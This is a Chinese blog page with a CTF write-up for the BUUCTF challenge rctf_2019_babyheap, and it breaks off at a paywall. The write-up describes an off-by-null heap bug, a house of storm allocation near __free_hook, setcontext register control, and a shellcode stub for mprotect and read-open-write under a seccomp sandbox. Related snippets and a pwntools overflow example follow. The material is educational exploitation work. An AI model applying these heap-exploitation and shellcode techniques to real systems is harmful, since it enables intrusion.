BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)

最新推荐文章于 2023-06-14 17:17:55 发布
最新推荐文章于 2023-06-14 17:17:55 发布
阅读量1.6k 收藏 5
点赞数
分类专栏: BUU-PWN CTF知识学习 文章标签: PWN 沙箱 orw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105709145
版权
该博客详细介绍了如何解决BUUCTF中的一道PWN题目rctf_2019_babyheap,该题目涉及沙箱环境下的堆溢出漏洞。由于execve被禁用,作者采用了house of storm漏洞和mprotect+shellcode注入的方法绕过保护,通过setcontext和SigreturnFrame控制寄存器执行shellcode,最终读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

题目分析

在这里插入图片描述
程序还有沙箱保护,把execve禁用了,只能orw了
在这里插入图片描述
在init中还把fastbin关了
在这里插入图片描述
在edit中有一个off-by-null溢出,以前这种情况都是用unlink进行攻击,不过这题我们没有地址所以无法使用
在这里插入图片描述

漏洞利用

这题一开始先利用house of storm漏洞分配到__free_hook附近的内存
关于house of storm的利用方法请见这篇文章:
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)

因为本题禁用了execve,所以我们就不考虑写入system的地址了,本题采用的是mprotect+shellcode注入的做法,思路来源是星盟的WP(RCTF2019 pwn writeup 集合

首先,我们把setcontent+53的地址写入__free_hook,并在其之后0x10字节内存中写上两遍__free_hook+0x18的地址,最后把如下shellcode1写入:

xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi

setcontext的主要代码如下:

<setcontext>:	push   rdi
<setcontext+1>:	lea    rsi,[rdi+0x128]
<setcontext+8>:	xor    edx,edx
<setcontext+10>:	mov    edi,0x2
<setcontext+15>:	mov    r10d,0x8
<setcontext+21>:	mov    eax,0xe
<setcontext+26>:	syscall 
<setcontext+28>:	pop    rdi
<setcontext+29>:	cmp    rax,0xfffffffffffff001
<setcontext+35>:	jae    0x7ffff7a54bc0 <setcontext+128>
<setcontext+37>:	mov    rcx,QWORD PTR [rdi+0xe0]
<setcontext+44>:	fldenv [rcx]
<setcontext+46>:	ldmxcsr DWORD PTR [rdi+0x1c0]
<setcontext+53>:	mov    rsp,QWORD PTR [rdi+0xa0]
<setcontext+60>:	mov    rbx,QWORD PTR [rdi+0x80]
<setcontext+67>:	mov    rbp,QWORD PTR [rdi+0x78]
<setcontext+71>:	mov    r12,QWORD PTR [rdi+0x48]
<setcontext+75>:	mov    r13,QWORD PTR [rdi+0x50]
<setcontext+79>:	mov    r14,QWORD PTR [rdi
最低0.47元/天 解锁文章
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 735
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4460
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
rctf_2019_babyheap、0ctf_2018_heapstorm2学习(house of storm
weixin_46521144的博客
09-10 1593
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
0ctf_2018_heapstorm2 && rctf_2019_babyheap
qq_73149934的博客
06-14 262
分配合适的chunk,unsortedbin 剩余的一个chunk(0x4e1)是我们需要的largebin chunk,此时处于释放状态。这看似没有问题,但是注意,strcpy函数会在末尾加上null,相当于13个字节,发生了off by null。2.23-0ubuntu11house of storm,poison null byte,风水,orw。分配合适的chunk,chunk2是unsorted chunk(0x4f1),此时处于分配状态。同时,mallopt函数禁用了fastbin。
BUUCTF 0ctf-babyheap
doudoudedi
12-20 466
这道题分配内存空间是用calloc释放之后会清空分配的内容 edit函数存在溢出我们由打赢函数指针数组存在satck地址随机,我们先想到的fastbin attack写onegadget但是要先有libc基址也是先是information leak然后contorl pc我们就可以 先分配4个 add(0x10) #0 add(0x10) #1 add(0x80) #2 add(0x10...
buuctf】cscctf_2019_qual_babyheap
weixin_51055545的博客
02-15 1931
buuctf【cscctf_2019_qual_babyheap】 今天找了一道100分题目,题目本身并没有那么难 例行检查 64位的程序,保护机制全开,放到IDA中分析 漏洞分析 函数功能很简单,功能基本齐全,漏洞点在creat()中, 当我们申请块,写入内容时,会在最后多写入一个’\x00’字节,存在off by null 溢出,但程序只允许我们申请15个块,因此要合理利用块。 利用思路 1.通过for循环申请足够多的块,在将其释放,构造出unsorted bin 2.风水,利用off
BUUCTFrctf2018_babyheap
weixin_51055545的博客
03-06 3299
BUUCTFrctf2018_babyheap】 今天下午干了一下午,估计是我太菜了呜呜呜 拿到附件,先检查程序 例行检查: 保护机制全开,这很‘题’ 程序和漏洞分析 程序又add,show,del三个功能,漏洞点在add()中; 存在off by null漏洞,可以溢出一个’\x00’字节, show(),del()函数功能正常, 而程序add块时,调用的是calloc,即限制了我们申请tcachebin,我们不能申请tcachebin,也就不可以来打free_hook来get shell
BUUCTF(pwn) babyheap_0ctf_2017
半岛铁盒的博客
07-30 308
入门题 main菜单 add edit edit,我们写入数据的长度是我们可以自己控制的,我们可以利用这点溢出到另一个块上 free,普通的释放chunk的过程 show 利用过程:溢出,可以通过重叠来泄露libc 分为两步: 第一次先泄露 libc 地址, 第二次利用fastbin attack,修改malloc_hook为one_gadget from pwn import * context.log_level = 'debug' p=remote("node4.buuoj.c
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 490
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 559
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 322
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3316
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 311
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 308
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1196
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 283
buuctf-pwn 067~072题题解
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 1003
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 4068
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道的题目,第一次接触的小伙伴可以去看一下这个视频,我也刚接触不久,有些地方我也讲不清楚 ida载入,先看一下main函数,题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6295
这道题和之前的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值